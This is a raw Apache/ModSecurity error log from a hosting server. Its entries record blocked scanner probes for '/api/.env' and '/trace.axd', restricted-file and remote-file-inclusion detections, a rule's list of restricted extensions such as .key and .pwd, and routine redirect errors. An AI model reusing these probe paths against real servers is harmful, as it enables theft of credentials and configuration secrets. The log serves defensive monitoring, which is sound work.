[Mon May 11 13:22:56.576275 2026] [security2:error] [pid 1319953:tid 1319971] [client 195.178.110.157:17198] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/api/.env"] [unique_id "agG8EOSQ-m-m0ukSShtaGQAAAVA"]
[Mon May 11 13:22:59.736534 2026] [security2:error] [pid 1319886:tid 1319937] [client 195.178.110.157:17220] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ventes-privees-auto.fr"] [uri "/api/.env"] [unique_id "agG8E6y-5-wpj6Sx56ZwrQAAABg"]
[Mon May 11 13:22:59.736729 2026] [security2:error] [pid 1319886:tid 1319937] [client 195.178.110.157:17220] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "ventes-privees-auto.fr"] [uri "/api/.env"] [unique_id "agG8E6y-5-wpj6Sx56ZwrQAAABg"]
[Mon May 11 13:23:03.336521 2026] [core:error] [pid 1320674:tid 1320695] [client 20.151.0.198:15137] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:23:03.336555 2026] [core:error] [pid 1320674:tid 1320695] [client 20.151.0.198:15137] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:23:05.348958 2026] [core:error] [pid 1319998:tid 1320018] [client 20.151.0.198:51557] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:23:05.348993 2026] [core:error] [pid 1319998:tid 1320018] [client 20.151.0.198:51557] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:23:07.048467 2026] [core:error] [pid 1319885:tid 1319889] [client 20.151.0.198:53632] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:23:07.048506 2026] [core:error] [pid 1319885:tid 1319889] [client 20.151.0.198:53632] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:23:09.241032 2026] [security2:error] [pid 1319953:tid 1319971] [client 195.178.110.157:17198] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agG8EOSQ-m-m0ukSShtaGQAAAVA"]
[Mon May 11 13:23:09.245425 2026] [core:error] [pid 1320398:tid 1320412] [client 20.151.0.198:15065] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:23:09.245454 2026] [core:error] [pid 1320398:tid 1320412] [client 20.151.0.198:15065] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:23:09.458811 2026] [security2:error] [pid 1319998:tid 1320003] [client 195.178.110.157:56992] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agG7_at2WtvoFr7xvGysWAAAAIM"]
[Mon May 11 13:23:12.774400 2026] [security2:error] [pid 1319885:tid 1319922] [client 195.178.110.157:56852] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agG7_VchVQ3tCn0m9OovZQAAARI"]
[Mon May 11 13:23:13.310300 2026] [security2:error] [pid 1320398:tid 1320421] [client 46.101.1.225:44698] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".axd"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "info.autobuyes.com"] [uri "/trace.axd"] [unique_id "agG8IeJEyNRN152ArORh_AAAAFU"]
[Mon May 11 13:23:13.310655 2026] [security2:error] [pid 1320398:tid 1320421] [client 46.101.1.225:44698] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "info.autobuyes.com"] [uri "/trace.axd"] [unique_id "agG8IeJEyNRN152ArORh_AAAAFU"]
[Mon May 11 13:23:14.879684 2026] [security2:error] [pid 1319885:tid 1319912] [client 195.178.110.157:57040] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agG8AFchVQ3tCn0m9OovagAAAQ4"]
[Mon May 11 13:23:14.935860 2026] [security2:error] [pid 1320398:tid 1320420] [client 195.178.110.157:57116] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agG8AeJEyNRN152ArORh1QAAAFQ"]
[Mon May 11 13:23:15.596881 2026] [security2:error] [pid 1320398:tid 1320406] [client 195.178.110.157:56952] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agG7_eJEyNRN152ArORhzAAAAEY"]
[Mon May 11 13:23:16.626578 2026] [core:error] [pid 1319998:tid 1320003] [client 20.151.0.198:53649] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:23:16.626621 2026] [core:error] [pid 1319998:tid 1320003] [client 20.151.0.198:53649] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:23:16.644365 2026] [security2:error] [pid 1319953:tid 1319976] [client 195.178.110.157:57090] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agG8AeSQ-m-m0ukSShtZ-gAAAVU"]
[Mon May 11 13:23:17.619880 2026] [security2:error] [pid 1319998:tid 1320007] [client 195.178.110.157:57048] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agG8AKt2WtvoFr7xvGysXQAAAIc"]
[Mon May 11 13:23:18.222230 2026] [security2:error] [pid 1319886:tid 1319934] [client 195.178.110.157:57168] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agG8Aay-5-wpj6Sx56ZwiQAAABY"]
[Mon May 11 13:23:19.506192 2026] [security2:error] [pid 1320398:tid 1320409] [client 195.178.110.157:57030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agG7_eJEyNRN152ArORhywAAAEk"]
[Mon May 11 13:23:19.576380 2026] [security2:error] [pid 1319953:tid 1319970] [client 195.178.110.157:57094] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agG8AeSQ-m-m0ukSShtZ_AAAAU8"]
[Mon May 11 13:23:20.458080 2026] [security2:error] [pid 1320398:tid 1320400] [client 195.178.110.157:57146] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agG8AeJEyNRN152ArORh0gAAAEA"]
[Mon May 11 13:23:20.579073 2026] [security2:error] [pid 1319885:tid 1319891] [client 195.178.110.157:31030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agG8DFchVQ3tCn0m9OovhwAAAQM"]
[Mon May 11 13:23:21.535944 2026] [security2:error] [pid 1319885:tid 1319925] [client 195.178.110.157:30988] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agG8BlchVQ3tCn0m9OoveQAAARM"]
[Mon May 11 13:23:22.101263 2026] [security2:error] [pid 1319885:tid 1319935] [client 195.178.110.157:57112] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agG8AVchVQ3tCn0m9OovbAAAARc"]
[Mon May 11 13:23:23.811737 2026] [security2:error] [pid 1320398:tid 1320407] [client 195.178.110.157:56876] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=5,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): Possible Remote File Inclusion (RFI) Attack: URL Parameter using IP Address"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agG7_eJEyNRN152ArORhygAAAEc"]
[Mon May 11 13:23:23.864271 2026] [security2:error] [pid 1320398:tid 1320421] [client 46.101.1.225:44698] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "info.autobuyes.com"] [uri "/index.php"] [unique_id "agG8IeJEyNRN152ArORh_AAAAFU"]
[Mon May 11 13:23:24.485801 2026] [security2:error] [pid 1319886:tid 1319937] [client 195.178.110.157:17220] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agG8E6y-5-wpj6Sx56ZwrQAAABg"]
[Mon May 11 13:23:24.948916 2026] [security2:error] [pid 1319953:tid 1319979] [client 195.178.110.157:57024] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agG7_eSQ-m-m0ukSShtZ8gAAAVg"]
[Mon May 11 13:23:24.973616 2026] [security2:error] [pid 1319886:tid 1319901] [client 195.178.110.157:57076] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agG8Aay-5-wpj6Sx56ZwiwAAAAI"]
[Mon May 11 13:23:24.978558 2026] [security2:error] [pid 1319998:tid 1320019] [client 195.178.110.157:31002] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agG8Cat2WtvoFr7xvGysdQAAAJM"]
[Mon May 11 13:23:25.060459 2026] [security2:error] [pid 1319886:tid 1319914] [client 195.178.110.157:57062] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agG8Aay-5-wpj6Sx56ZwigAAAAo"]
[Mon May 11 13:23:25.751745 2026] [core:error] [pid 1319885:tid 1319920] [client 20.151.0.198:53671] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:23:25.751775 2026] [core:error] [pid 1319885:tid 1319920] [client 20.151.0.198:53671] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:23:25.951806 2026] [security2:error] [pid 1319998:tid 1320000] [client 195.178.110.157:57080] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "ventes-privees-auto.fr"] [uri "/index.php"] [unique_id "agG8Aat2WtvoFr7xvGysYgAAAIA"]
[Mon May 11 13:23:27.216200 2026] [autoindex:error] [pid 1319886:tid 1319924] [client 185.242.177.50:39364] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 13:23:28.240871 2026] [core:error] [pid 1319885:tid 1319892] [client 20.151.0.198:53666] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:23:28.240906 2026] [core:error] [pid 1319885:tid 1319892] [client 20.151.0.198:53666] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:23:36.596248 2026] [core:error] [pid 1319998:tid 1320022] [client 20.151.0.198:51574] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:23:36.596277 2026] [core:error] [pid 1319998:tid 1320022] [client 20.151.0.198:51574] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:23:41.578350 2026] [core:error] [pid 1320674:tid 1320690] [client 20.151.0.198:14436] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:23:41.578383 2026] [core:error] [pid 1320674:tid 1320690] [client 20.151.0.198:14436] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:23:43.743994 2026] [core:error] [pid 1319885:tid 1319898] [client 20.151.0.198:14409] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:23:43.744026 2026] [core:error] [pid 1319885:tid 1319898] [client 20.151.0.198:14409] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:23:47.156017 2026] [core:error] [pid 1320398:tid 1320404] [client 20.151.0.198:14450] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:23:47.156042 2026] [core:error] [pid 1320398:tid 1320404] [client 20.151.0.198:14450] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:23:52.233264 2026] [authz_core:error] [pid 1319998:tid 1320002] [client 47.128.58.26:64286] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/Requests/error_log
[Mon May 11 13:23:53.488470 2026] [core:error] [pid 1320674:tid 1320709] [client 20.151.0.198:15128] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:23:53.488500 2026] [core:error] [pid 1320674:tid 1320709] [client 20.151.0.198:15128] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:04.600743 2026] [core:error] [pid 1319885:tid 1319893] [client 20.151.0.198:15064] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:04.600856 2026] [core:error] [pid 1319885:tid 1319893] [client 20.151.0.198:15064] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:07.494787 2026] [core:error] [pid 1320398:tid 1320424] [client 20.151.0.198:51556] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:07.494820 2026] [core:error] [pid 1320398:tid 1320424] [client 20.151.0.198:51556] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:09.828680 2026] [core:error] [pid 1319953:tid 1319958] [client 20.151.0.198:53632] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:09.828712 2026] [core:error] [pid 1319953:tid 1319958] [client 20.151.0.198:53632] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:13.055392 2026] [core:error] [pid 1319885:tid 1319930] [client 20.151.0.198:51572] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:13.055423 2026] [core:error] [pid 1319885:tid 1319930] [client 20.151.0.198:51572] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:15.106549 2026] [core:error] [pid 1319953:tid 1319976] [client 20.151.0.198:14429] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:15.106586 2026] [core:error] [pid 1319953:tid 1319976] [client 20.151.0.198:14429] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:18.550235 2026] [core:error] [pid 1320674:tid 1320691] [client 20.151.0.198:15043] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 13:24:18.550268 2026] [core:error] [pid 1320674:tid 1320691] [client 20.151.0.198:15043] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
